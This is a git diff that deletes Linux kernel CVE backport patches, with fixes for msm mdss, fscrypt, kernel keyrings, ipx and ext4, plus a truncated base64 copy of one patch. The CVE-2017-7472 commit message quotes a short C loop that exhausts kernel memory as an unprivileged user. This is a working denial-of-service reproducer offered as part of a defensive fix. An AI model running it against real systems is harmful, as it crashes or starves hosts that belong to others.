- 	INIT_DBG_BUF(dbg_buf);
--	write_str(&dbg_buf, "===============================");
--	write_str(&dbg_buf, "INSTANCE: %p (%s)", inst,
-+	write_str(dbg_buf, "===============================");
-+	write_str(dbg_buf, "INSTANCE: %p (%s)", inst,
- 								"BA device");
--	write_str(&dbg_buf, "===============================");
--	write_str(&dbg_buf, "dev: %p", inst->dev_ctxt);
--	write_str(&dbg_buf, "state: %d", inst->state);
-+	write_str(dbg_buf, "===============================");
-+	write_str(dbg_buf, "dev: %p", inst->dev_ctxt);
-+	write_str(dbg_buf, "state: %d", inst->state);
- 
--	return simple_read_from_buffer(buf, count, ppos,
--		dbg_buf.ptr, dbg_buf.filled_size);
-+	size = simple_read_from_buffer(buf, count, ppos,
-+		dbg_buf->ptr, dbg_buf->filled_size);
-+
-+	kfree(dbg_buf);
-+
-+	return size;
- }
- 
- static const struct file_operations inst_info_fops = {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7373/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7373/3.10/0001.patch
deleted file mode 100644
index d7b5ea41..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7373/3.10/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From eac4a77bb71750b02e91508b15c9aaf4fe2b94ae Mon Sep 17 00:00:00 2001
-From: Sachin Bhayare <sachin.bhayare@codeaurora.org>
-Date: Fri, 23 Dec 2016 11:22:44 +0530
-Subject: msm: mdss: Fix invalid dma attachment during fb shutdown
-
-If DMA attachment fail during fb_mmap, all ION memory will get free. It
-is necessary to reset the fbmem and fb_attachemnt pointer to NULL,
-otherwise during shutdown will perform another free and causing issue.
-
-CRs-Fixed: 1090244
-Change-Id: I92affcf2ce039eecfc72b7c191e058f37815c726
-Signed-off-by: Benjamin Chan <bkchan@codeaurora.org>
-Signed-off-by: Sachin Bhayare <sachin.bhayare@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_fb.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 2e8092d..c2d1441 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -1660,6 +1660,8 @@ int mdss_fb_alloc_fb_ion_memory(struct msm_fb_data_type *mfd, size_t fb_size)
- 
- fb_mmap_failed:
- 	ion_free(mfd->fb_ion_client, mfd->fb_ion_handle);
-+	mfd->fb_ion_handle = NULL;
-+	mfd->fbmem_buf = NULL;
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7373/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-7373/4.4/0002.patch
deleted file mode 100644
index 134f7075..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7373/4.4/0002.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From e5eb0d3aa6fe62ee437a2269a1802b1a72f61b75 Mon Sep 17 00:00:00 2001
-From: Benjamin Chan <bkchan@codeaurora.org>
-Date: Thu, 15 Dec 2016 13:46:42 -0500
-Subject: msm: mdss: Fix invalid dma attachment during fb shutdown
-
-If DMA attachment fail during fb_mmap, all ION memory will get free. It
-is necessary to reset the fbmem and fb_attachemnt pointer to NULL,
-otherwise during shutdown will perform another free and causing issue.
-
-CRs-Fixed: 1090244
-Change-Id: I92affcf2ce039eecfc72b7c191e058f37815c726
-Signed-off-by: Benjamin Chan <bkchan@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_fb.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/video/fbdev/msm/mdss_fb.c b/drivers/video/fbdev/msm/mdss_fb.c
-index 98ca6c3..152879a 100644
---- a/drivers/video/fbdev/msm/mdss_fb.c
-+++ b/drivers/video/fbdev/msm/mdss_fb.c
-@@ -2082,6 +2082,10 @@ err_put:
- 	dma_buf_put(mfd->fbmem_buf);
- fb_mmap_failed:
- 	ion_free(mfd->fb_ion_client, mfd->fb_ion_handle);
-+	mfd->fb_attachment = NULL;
-+	mfd->fb_table = NULL;
-+	mfd->fb_ion_handle = NULL;
-+	mfd->fbmem_buf = NULL;
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7374/4.2-4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7374/4.2-4.10/0001.patch
deleted file mode 100644
index 55e33c63..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7374/4.2-4.10/0001.patch
+++ /dev/null
@@ -1,251 +0,0 @@
-From 1b53cf9815bb4744958d41f3795d5d5a1d365e2d Mon Sep 17 00:00:00 2001
-From: Eric Biggers <ebiggers@google.com>
-Date: Tue, 21 Feb 2017 15:07:11 -0800
-Subject: fscrypt: remove broken support for detecting keyring key revocation
-
-Filesystem encryption ostensibly supported revoking a keyring key that
-had been used to "unlock" encrypted files, causing those files to become
-"locked" again.  This was, however, buggy for several reasons, the most
-severe of which was that when key revocation happened to be detected for
-an inode, its fscrypt_info was immediately freed, even while other
-threads could be using it for encryption or decryption concurrently.
-This could be exploited to crash the kernel or worse.
-
-This patch fixes the use-after-free by removing the code which detects
-the keyring key having been revoked, invalidated, or expired.  Instead,
-an encrypted inode that is "unlocked" now simply remains unlocked until
-it is evicted from memory.  Note that this is no worse than the case for
-block device-level encryption, e.g. dm-crypt, and it still remains
-possible for a privileged user to evict unused pages, inodes, and
-dentries by running 'sync; echo 3 > /proc/sys/vm/drop_caches', or by
-simply unmounting the filesystem.  In fact, one of those actions was
-already needed anyway for key revocation to work even somewhat sanely.
-This change is not expected to break any applications.
-
-In the future I'd like to implement a real API for fscrypt key
-revocation that interacts sanely with ongoing filesystem operations ---
-waiting for existing operations to complete and blocking new operations,
-and invalidating and sanitizing key material and plaintext from the VFS
-caches.  But this is a hard problem, and for now this bug must be fixed.
-
-This bug affected almost all versions of ext4, f2fs, and ubifs
-encryption, and it was potentially reachable in any kernel configured
-with encryption support (CONFIG_EXT4_ENCRYPTION=y,
-CONFIG_EXT4_FS_ENCRYPTION=y, CONFIG_F2FS_FS_ENCRYPTION=y, or
-CONFIG_UBIFS_FS_ENCRYPTION=y).  Note that older kernels did not use the
-shared fs/crypto/ code, but due to the potential security implications
-of this bug, it may still be worthwhile to backport this fix to them.
-
-Fixes: b7236e21d55f ("ext4 crypto: reorganize how we store keys in the inode")
-Cc: stable@vger.kernel.org # v4.2+
-Signed-off-by: Eric Biggers <ebiggers@google.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-Acked-by: Michael Halcrow <mhalcrow@google.com>
----
- fs/crypto/crypto.c          | 10 +--------
- fs/crypto/fname.c           |  2 +-
- fs/crypto/fscrypt_private.h |  4 ----
- fs/crypto/keyinfo.c         | 52 ++++++++-------------------------------------
- 4 files changed, 11 insertions(+), 57 deletions(-)
-
-diff --git a/fs/crypto/crypto.c b/fs/crypto/crypto.c
-index 02a7a92..6d6eca3 100644
---- a/fs/crypto/crypto.c
-+++ b/fs/crypto/crypto.c
-@@ -327,7 +327,6 @@ EXPORT_SYMBOL(fscrypt_decrypt_page);
- static int fscrypt_d_revalidate(struct dentry *dentry, unsigned int flags)
- {
- 	struct dentry *dir;
--	struct fscrypt_info *ci;
- 	int dir_has_key, cached_with_key;
- 
- 	if (flags & LOOKUP_RCU)
-@@ -339,18 +338,11 @@ static int fscrypt_d_revalidate(struct dentry *dentry, unsigned int flags)
- 		return 0;
- 	}
- 
--	ci = d_inode(dir)->i_crypt_info;
--	if (ci && ci->ci_keyring_key &&
--	    (ci->ci_keyring_key->flags & ((1 << KEY_FLAG_INVALIDATED) |
--					  (1 << KEY_FLAG_REVOKED) |
--					  (1 << KEY_FLAG_DEAD))))
--		ci = NULL;
--
- 	/* this should eventually be an flag in d_flags */
- 	spin_lock(&dentry->d_lock);
- 	cached_with_key = dentry->d_flags & DCACHE_ENCRYPTED_WITH_KEY;
- 	spin_unlock(&dentry->d_lock);
--	dir_has_key = (ci != NULL);
-+	dir_has_key = (d_inode(dir)->i_crypt_info != NULL);
- 	dput(dir);
- 
- 	/*
-diff --git a/fs/crypto/fname.c b/fs/crypto/fname.c
-index 13052b8..37b4989 100644
---- a/fs/crypto/fname.c
-+++ b/fs/crypto/fname.c
-@@ -350,7 +350,7 @@ int fscrypt_setup_filename(struct inode *dir, const struct qstr *iname,
- 		fname->disk_name.len = iname->len;
- 		return 0;
- 	}
--	ret = fscrypt_get_crypt_info(dir);
-+	ret = fscrypt_get_encryption_info(dir);
- 	if (ret && ret != -EOPNOTSUPP)
- 		return ret;
- 
-diff --git a/fs/crypto/fscrypt_private.h b/fs/crypto/fscrypt_private.h
-index fdbb8af..e39696e 100644
---- a/fs/crypto/fscrypt_private.h
-+++ b/fs/crypto/fscrypt_private.h
-@@ -67,7 +67,6 @@ struct fscrypt_info {
- 	u8 ci_filename_mode;
- 	u8 ci_flags;
- 	struct crypto_skcipher *ci_ctfm;
--	struct key *ci_keyring_key;
- 	u8 ci_master_key[FS_KEY_DESCRIPTOR_SIZE];
- };
- 
-@@ -101,7 +100,4 @@ extern int fscrypt_do_page_crypto(const struct inode *inode,
- extern struct page *fscrypt_alloc_bounce_page(struct fscrypt_ctx *ctx,
- 					      gfp_t gfp_flags);
- 
--/* keyinfo.c */
--extern int fscrypt_get_crypt_info(struct inode *);
--
- #endif /* _FSCRYPT_PRIVATE_H */
-diff --git a/fs/crypto/keyinfo.c b/fs/crypto/keyinfo.c
-index 02eb6b9..cb3e82a 100644
---- a/fs/crypto/keyinfo.c
-+++ b/fs/crypto/keyinfo.c
-@@ -95,6 +95,7 @@ static int validate_user_key(struct fscrypt_info *crypt_info,
- 	kfree(description);
- 	if (IS_ERR(keyring_key))
- 		return PTR_ERR(keyring_key);
-+	down_read(&keyring_key->sem);
- 
- 	if (keyring_key->type != &key_type_logon) {
- 		printk_once(KERN_WARNING
-@@ -102,11 +103,9 @@ static int validate_user_key(struct fscrypt_info *crypt_info,
- 		res = -ENOKEY;
- 		goto out;
- 	}
--	down_read(&keyring_key->sem);
- 	ukp = user_key_payload(keyring_key);
- 	if (ukp->datalen != sizeof(struct fscrypt_key)) {
- 		res = -EINVAL;
--		up_read(&keyring_key->sem);
- 		goto out;
- 	}
- 	master_key = (struct fscrypt_key *)ukp->data;
-@@ -117,17 +116,11 @@ static int validate_user_key(struct fscrypt_info *crypt_info,
- 				"%s: key size incorrect: %d\n",
- 				__func__, master_key->size);
- 		res = -ENOKEY;
--		up_read(&keyring_key->sem);
- 		goto out;
- 	}
- 	res = derive_key_aes(ctx->nonce, master_key->raw, raw_key);
--	up_read(&keyring_key->sem);
--	if (res)
--		goto out;
--
--	crypt_info->ci_keyring_key = keyring_key;
--	return 0;
- out:
-+	up_read(&keyring_key->sem);
- 	key_put(keyring_key);
- 	return res;
- }
-@@ -169,12 +162,11 @@ static void put_crypt_info(struct fscrypt_info *ci)
- 	if (!ci)
- 		return;
- 
--	key_put(ci->ci_keyring_key);
- 	crypto_free_skcipher(ci->ci_ctfm);
- 	kmem_cache_free(fscrypt_info_cachep, ci);
- }
- 
--int fscrypt_get_crypt_info(struct inode *inode)
-+int fscrypt_get_encryption_info(struct inode *inode)
- {
- 	struct fscrypt_info *crypt_info;
- 	struct fscrypt_context ctx;
-@@ -184,21 +176,15 @@ int fscrypt_get_crypt_info(struct inode *inode)
- 	u8 *raw_key = NULL;
- 	int res;
- 
-+	if (inode->i_crypt_info)
-+		return 0;
-+
- 	res = fscrypt_initialize(inode->i_sb->s_cop->flags);
- 	if (res)
- 		return res;
- 
- 	if (!inode->i_sb->s_cop->get_context)
- 		return -EOPNOTSUPP;
--retry:
--	crypt_info = ACCESS_ONCE(inode->i_crypt_info);
--	if (crypt_info) {
--		if (!crypt_info->ci_keyring_key ||
--				key_validate(crypt_info->ci_keyring_key) == 0)
--			return 0;
--		fscrypt_put_encryption_info(inode, crypt_info);
--		goto retry;
--	}
- 
- 	res = inode->i_sb->s_cop->get_context(inode, &ctx, sizeof(ctx));
- 	if (res < 0) {
-@@ -229,7 +215,6 @@ retry:
- 	crypt_info->ci_data_mode = ctx.contents_encryption_mode;
- 	crypt_info->ci_filename_mode = ctx.filenames_encryption_mode;
- 	crypt_info->ci_ctfm = NULL;
--	crypt_info->ci_keyring_key = NULL;
- 	memcpy(crypt_info->ci_master_key, ctx.master_key_descriptor,
- 				sizeof(crypt_info->ci_master_key));
- 
-@@ -273,14 +258,8 @@ retry:
- 	if (res)
- 		goto out;
- 
--	kzfree(raw_key);
--	raw_key = NULL;
--	if (cmpxchg(&inode->i_crypt_info, NULL, crypt_info) != NULL) {
--		put_crypt_info(crypt_info);
--		goto retry;
--	}
--	return 0;
--
-+	if (cmpxchg(&inode->i_crypt_info, NULL, crypt_info) == NULL)
-+		crypt_info = NULL;
- out:
- 	if (res == -ENOKEY)
- 		res = 0;
-@@ -288,6 +267,7 @@ out:
- 	kzfree(raw_key);
- 	return res;
- }
-+EXPORT_SYMBOL(fscrypt_get_encryption_info);
- 
- void fscrypt_put_encryption_info(struct inode *inode, struct fscrypt_info *ci)
- {
-@@ -305,17 +285,3 @@ void fscrypt_put_encryption_info(struct inode *inode, struct fscrypt_info *ci)
- 	put_crypt_info(ci);
- }
- EXPORT_SYMBOL(fscrypt_put_encryption_info);
--
--int fscrypt_get_encryption_info(struct inode *inode)
--{
--	struct fscrypt_info *ci = inode->i_crypt_info;
--
--	if (!ci ||
--		(ci->ci_keyring_key &&
--		 (ci->ci_keyring_key->flags & ((1 << KEY_FLAG_INVALIDATED) |
--					       (1 << KEY_FLAG_REVOKED) |
--					       (1 << KEY_FLAG_DEAD)))))
--		return fscrypt_get_crypt_info(inode);
--	return 0;
--}
--EXPORT_SYMBOL(fscrypt_get_encryption_info);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7472/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7472/ANY/0001.patch
deleted file mode 100644
index dc8e7e3d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7472/ANY/0001.patch
+++ /dev/null
@@ -1,182 +0,0 @@
-From 6efda2501976288f10895834ba2782d0df093441 Mon Sep 17 00:00:00 2001
-From: Eric Biggers <ebiggers@google.com>
-Date: Tue, 18 Apr 2017 15:31:09 +0100
-Subject: KEYS: fix keyctl_set_reqkey_keyring() to not leak thread keyrings
-
-commit c9f838d104fed6f2f61d68164712e3204bf5271b upstream.
-
-This fixes CVE-2017-7472.
-
-Running the following program as an unprivileged user exhausts kernel
-memory by leaking thread keyrings:
-
-	#include <keyutils.h>
-
-	int main()
-	{
-		for (;;)
-			keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
-	}
-
-Fix it by only creating a new thread keyring if there wasn't one before.
-To make things more consistent, make install_thread_keyring_to_cred()
-and install_process_keyring_to_cred() both return 0 if the corresponding
-keyring is already present.
-
-Fixes: d84f4f992cbd ("CRED: Inaugurate COW credentials")
-Signed-off-by: Eric Biggers <ebiggers@google.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- security/keys/keyctl.c       | 11 ++++-------
- security/keys/process_keys.c | 44 +++++++++++++++++++++++++++-----------------
- 2 files changed, 31 insertions(+), 24 deletions(-)
-
-diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
-index af86b35..1187d2f 100644
---- a/security/keys/keyctl.c
-+++ b/security/keys/keyctl.c
-@@ -1258,8 +1258,8 @@ error:
-  * Read or set the default keyring in which request_key() will cache keys and
-  * return the old setting.
-  *
-- * If a process keyring is specified then this will be created if it doesn't
-- * yet exist.  The old setting will be returned if successful.
-+ * If a thread or process keyring is specified then it will be created if it
-+ * doesn't yet exist.  The old setting will be returned if successful.
-  */
- long keyctl_set_reqkey_keyring(int reqkey_defl)
- {
-@@ -1284,11 +1284,8 @@ long keyctl_set_reqkey_keyring(int reqkey_defl)
- 
- 	case KEY_REQKEY_DEFL_PROCESS_KEYRING:
- 		ret = install_process_keyring_to_cred(new);
--		if (ret < 0) {
--			if (ret != -EEXIST)
--				goto error;
--			ret = 0;
--		}
-+		if (ret < 0)
-+			goto error;
- 		goto set;
- 
- 	case KEY_REQKEY_DEFL_DEFAULT:
-diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
-index db91639..162077d 100644
---- a/security/keys/process_keys.c
-+++ b/security/keys/process_keys.c
-@@ -125,13 +125,18 @@ error:
- }
- 
- /*
-- * Install a fresh thread keyring directly to new credentials.  This keyring is
-- * allowed to overrun the quota.
-+ * Install a thread keyring to the given credentials struct if it didn't have
-+ * one already.  This is allowed to overrun the quota.
-+ *
-+ * Return: 0 if a thread keyring is now present; -errno on failure.
-  */
- int install_thread_keyring_to_cred(struct cred *new)
- {
- 	struct key *keyring;
- 
-+	if (new->thread_keyring)
-+		return 0;
-+
- 	keyring = keyring_alloc("_tid", new->uid, new->gid, new,
- 				KEY_POS_ALL | KEY_USR_VIEW,
- 				KEY_ALLOC_QUOTA_OVERRUN, NULL);
-@@ -143,7 +148,9 @@ int install_thread_keyring_to_cred(struct cred *new)
- }
- 
- /*
-- * Install a fresh thread keyring, discarding the old one.
-+ * Install a thread keyring to the current task if it didn't have one already.
-+ *
-+ * Return: 0 if a thread keyring is now present; -errno on failure.
-  */
- static int install_thread_keyring(void)
- {
-@@ -154,8 +161,6 @@ static int install_thread_keyring(void)
- 	if (!new)
- 		return -ENOMEM;
- 
--	BUG_ON(new->thread_keyring);
--
- 	ret = install_thread_keyring_to_cred(new);
- 	if (ret < 0) {
- 		abort_creds(new);
-@@ -166,17 +171,17 @@ static int install_thread_keyring(void)
- }
- 
- /*
-- * Install a process keyring directly to a credentials struct.
-+ * Install a process keyring to the given credentials struct if it didn't have
-+ * one already.  This is allowed to overrun the quota.
-  *
-- * Returns -EEXIST if there was already a process keyring, 0 if one installed,
-- * and other value on any other error
-+ * Return: 0 if a process keyring is now present; -errno on failure.
-  */
- int install_process_keyring_to_cred(struct cred *new)
- {
- 	struct key *keyring;
- 
- 	if (new->process_keyring)
--		return -EEXIST;
-+		return 0;
- 
- 	keyring = keyring_alloc("_pid", new->uid, new->gid, new,
- 				KEY_POS_ALL | KEY_USR_VIEW,
-@@ -189,11 +194,9 @@ int install_process_keyring_to_cred(struct cred *new)
- }
- 
- /*
-- * Make sure a process keyring is installed for the current process.  The
-- * existing process keyring is not replaced.
-+ * Install a process keyring to the current task if it didn't have one already.
-  *
-- * Returns 0 if there is a process keyring by the end of this function, some
-- * error otherwise.
-+ * Return: 0 if a process keyring is now present; -errno on failure.
-  */
- static int install_process_keyring(void)
- {
-@@ -207,14 +210,18 @@ static int install_process_keyring(void)
- 	ret = install_process_keyring_to_cred(new);
- 	if (ret < 0) {
- 		abort_creds(new);
--		return ret != -EEXIST ? ret : 0;
-+		return ret;
- 	}
- 
- 	return commit_creds(new);
- }
- 
- /*
-- * Install a session keyring directly to a credentials struct.
-+ * Install the given keyring as the session keyring of the given credentials
-+ * struct, replacing the existing one if any.  If the given keyring is NULL,
-+ * then install a new anonymous session keyring.
-+ *
-+ * Return: 0 on success; -errno on failure.
-  */
- int install_session_keyring_to_cred(struct cred *cred, struct key *keyring)
- {
-@@ -249,8 +256,11 @@ int install_session_keyring_to_cred(struct cred *cred, struct key *keyring)
- }
- 
- /*
-- * Install a session keyring, discarding the old one.  If a keyring is not
-- * supplied, an empty one is invented.
-+ * Install the given keyring as the session keyring of the current task,
-+ * replacing the existing one if any.  If the given keyring is NULL, then
-+ * install a new anonymous session keyring.
-+ *
-+ * Return: 0 on success; -errno on failure.
-  */
- static int install_session_keyring(struct key *keyring)
- {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7487/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7487/ANY/0001.patch
deleted file mode 100644
index f91b0b84..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7487/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From ee0d8d8482345ff97a75a7d747efc309f13b0d80 Mon Sep 17 00:00:00 2001
-From: Dan Carpenter <dan.carpenter@oracle.com>
-Date: Tue, 2 May 2017 13:58:53 +0300
-Subject: ipx: call ipxitf_put() in ioctl error path
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-We should call ipxitf_put() if the copy_to_user() fails.
-
-Reported-by: 李强 <liqiang6-s@360.cn>
-Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipx/af_ipx.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/net/ipx/af_ipx.c b/net/ipx/af_ipx.c
-index 8a9219f..fa31ef2 100644
---- a/net/ipx/af_ipx.c
-+++ b/net/ipx/af_ipx.c
-@@ -1168,11 +1168,10 @@ static int ipxitf_ioctl(unsigned int cmd, void __user *arg)
- 		sipx->sipx_network	= ipxif->if_netnum;
- 		memcpy(sipx->sipx_node, ipxif->if_node,
- 			sizeof(sipx->sipx_node));
--		rc = -EFAULT;
-+		rc = 0;
- 		if (copy_to_user(arg, &ifr, sizeof(ifr)))
--			break;
-+			rc = -EFAULT;
- 		ipxitf_put(ipxif);
--		rc = 0;
- 		break;
- 	}
- 	case SIOCAIPXITFCRT:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch
deleted file mode 100644
index 6204174f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 3127779c064c6358310e542c725fe1f64dd6a60f Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Mon, 17 Sep 2001 00:00:00 +0200
-Subject: [PATCH] ext4: fix data exposure after a crash
-
-commit 06bd3c36a733ac27962fea7d6f47168841376824 upstream.
-
-Huang has reported that in his powerfail testing he is seeing stale
-block contents in some of recently allocated blocks although he mounts
-ext4 in data=ordered mode. After some investigation I have found out
-that indeed when delayed allocation is used, we don't add inode to
-transaction's list of inodes needing flushing before commit. Originally
-we were doing that but commit f3b59291a69d removed the logic with a
-flawed argument that it is not needed.
-
-The problem is that although for delayed allocated blocks we write their
-contents immediately after allocating them, there is no guarantee that
-the IO scheduler or device doesn't reorder things and thus transaction
-allocating blocks and attaching them to inode can reach stable storage
-before actual block contents. Actually whenever we attach freshly
-allocated blocks to inode using a written extent, we should add inode to
-transaction's ordered inode list to make sure we properly wait for block
-contents to be written before committing the transaction. So that is
-what we do in this patch. This also handles other cases where stale data
-exposure was possible - like filling hole via mmap in
-data=ordered,nodelalloc mode.
-
-The only exception to the above rule are extending direct IO writes where
-blkdev_direct_IO() waits for IO to complete before increasing i_size and
-thus stale data exposure is not possible. For now we don't complicate
-the code with optimizing this special case since the overhead is pretty
-low. In case this is observed to be a performance problem we can always
-handle it using a special flag to ext4_map_blocks().
-
-Change-Id: I9f8b371c9fd716bf3d8af3780ce43e73d80cfb28
-Fixes: f3b59291a69d0b734be1fc8be489fef2dd846d3d
-Reported-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
-Tested-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
-Signed-off-by: Jan Kara <jack@suse.cz>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-[bwh: Backported to 3.16:
- - Drop check for EXT4_GET_BLOCKS_ZERO flag
- - Adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
-
-diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
-index 9d358dc..f472aed 100644
---- a/fs/ext4/inode.c
-+++ b/fs/ext4/inode.c
-@@ -661,6 +661,20 @@
- 		ret = check_block_validity(inode, map);
- 		if (ret != 0)
- 			return ret;
-+
-+		/*
-+		 * Inodes with freshly allocated blocks where contents will be
-+		 * visible after transaction commit must be on transaction's
-+		 * ordered data list.
-+		 */
-+		if (map->m_flags & EXT4_MAP_NEW &&
-+		    !(map->m_flags & EXT4_MAP_UNWRITTEN) &&
-+		    !IS_NOQUOTA(inode) &&
-+		    ext4_should_order_data(inode)) {
-+			ret = ext4_jbd2_file_inode(handle, inode);
-+			if (ret)
-+				return ret;
-+		}
- 	}
- 	return retval;
- }
-@@ -1116,15 +1130,6 @@
- 	int i_size_changed = 0;
- 
- 	trace_ext4_write_end(inode, pos, len, copied);
--	if (ext4_test_inode_state(inode, EXT4_STATE_ORDERED_MODE)) {
--		ret = ext4_jbd2_file_inode(handle, inode);
--		if (ret) {
--			unlock_page(page);
--			page_cache_release(page);
--			goto errout;
--		}
--	}
--
- 	if (ext4_has_inline_data(inode)) {
- 		ret = ext4_write_inline_data_end(inode, pos, len,
- 						 copied, page);
diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch.base64
deleted file mode 100644
index 9708ac07..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAzMTI3Nzc5YzA2NGM2MzU4MzEwZTU0MmM3MjVmZTFmNjRkZDZhNjBmIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBKYW4gS2FyYSA8amFja0BzdXNlLmN6PgpEYXRlOiBNb24sIDE3IFNlcCAyMDAxIDAwOjAwOjAwICswMjAwClN1YmplY3Q6IFtQQVRDSF0gZXh0NDogZml4IGRhdGEgZXhwb3N1cmUgYWZ0ZXIgYSBjcmFzaAoKY29tbWl0IDA2YmQzYzM2YTczM2FjMjc5NjJmZWE3ZDZmNDcxNjg4NDEzNzY4MjQgdXBzdHJlYW0uCgpIdWFuZyBoYXMgcmVwb3J0ZWQgdGhhdCBpbiBoaXMgcG93ZXJmYWlsIHRlc3RpbmcgaGUgaXMgc2VlaW5nIHN0YWxlCmJsb2NrIGNvbnRlbnRzIGluIHNvbWUgb2YgcmVjZW50bHkgYWxsb2NhdGVkIGJsb2NrcyBhbHRob3VnaCBoZSBtb3VudHMKZXh0NCBpbiBkYXRhPW9yZGVyZWQgbW9kZS4gQWZ0ZXIgc29tZSBpbnZlc3RpZ2F0aW9uIEkgaGF2ZSBmb3VuZCBvdXQKdGhhdCBpbmRlZWQgd2hlbiBkZWxheWVkIGFsbG9jYXRpb24gaXMgdXNlZCwgd2UgZG9uJ3QgYWRkIGlub2RlIHRvCnRyYW5zYWN0aW9uJ3MgbGlzdCBvZiBpbm9kZXMgbmVlZGluZyBmbHVzaGluZyBiZWZvcmUgY29tbWl0LiBPcmlnaW5hbGx5CndlIHdlcmUgZG9pbmcgdGhhdCBidXQgY29tbWl0IGYzYjU5MjkxYTY5ZCByZW1vdmVkIHRoZSBsb2dpYyB3aXRoIGEKZmxhd2VkIGFyZ3VtZW50IHRoYXQgaXQgaXMgbm90IG5lZWRlZC4KClRoZSBwcm9ibGVtIGlzIHRoYXQgYWx0aG91Z2ggZm9yIGRlbGF5ZWQgYWxsb2NhdGVkIGJsb2NrcyB3ZSB3cml0ZSB0aGVpcgpjb250ZW50cyBpbW1lZGlhdGVseSBhZnRlciBhbGxvY2F0aW5nIHRoZW0sIHRoZXJlIGlzIG5vIGd1YXJhbnRlZSB0aGF0CnRoZSBJTyBzY2hlZHVsZXIgb3IgZGV2aWNlIGRvZXNuJ3QgcmVvcmRlciB0aGluZ3MgYW5kIHRodXMgdHJhbnNhY3Rpb24KYWxsb2NhdGluZyBibG9ja3MgYW5kIGF0dGFjaGluZyB0aGVtIHRvIGlub2RlIGNhbiByZWFjaCBzdGFibGUgc3RvcmFnZQpiZWZvcmUgYWN0dWFsIGJsb2NrIGNvbnRlbnRzLiBBY3R1YWxseSB3aGVuZXZlciB3ZSBhdHRhY2ggZnJlc2hseQphbGxvY2F0ZWQgYmxvY2tzIHRvIGlub2RlIHVzaW5nIGEgd3JpdHRlbiBleHRlbnQsIHdlIHNob3VsZCBhZGQgaW5vZGUgdG8KdHJhbnNhY3Rpb24ncyBvcmRlcmVkIGlub2RlIGxpc3QgdG8gbWFrZSBzdXJlIHdlIHByb3Blcmx5IHdhaXQgZm9yIGJsb2NrCmNvbnRlbnRzIHRvIGJlIHdyaXR0ZW4gYmVmb3JlIGNvbW1pdHRpbmcgdGhlIHRyYW5zYWN0aW9uLiBTbyB0aGF0IGlzCndoYXQgd2UgZG8gaW4gdGhpcyBwYXRjaC4gVGhpcyBhbHNvIGhhbmRsZXMgb3RoZXIgY2FzZXMgd2hlcmUgc3RhbGUgZGF0YQpleHBvc3VyZSB3YXMgcG9zc2libGUgLSBsaWtlIGZpbGxpbmcgaG9sZSB2aWEgbW1hcCBpbgpkYXRhPW9yZGVyZWQsbm9kZWxhbGxvYyBtb2RlLgoKVGhlIG9ubHkgZXhjZXB0aW9uIHRvIHRoZSBhYm92ZSBydWxlIGFyZSBleHRlbmRpbmcgZGlyZWN0IElPIHdyaXRlcyB3aGVyZQpibGtkZXZfZGlyZWN0X0lPKCkgd2FpdHMgZm9yIElPIHRvIGNvbXBsZXRlIGJlZm9yZSBpbmNyZWFzaW5nIGlfc2l6ZSBhbmQKdGh1cyBzdGFsZSBkYXRhIGV4cG9zdXJlIGlzIG5vdCBwb3NzaWJsZS4gRm9yIG5vdyB3ZSBkb24ndCBjb21wbGljYXRlCnRoZSBjb2RlIHdpdGggb3B0aW1pemluZyB0aGlzIHNwZWN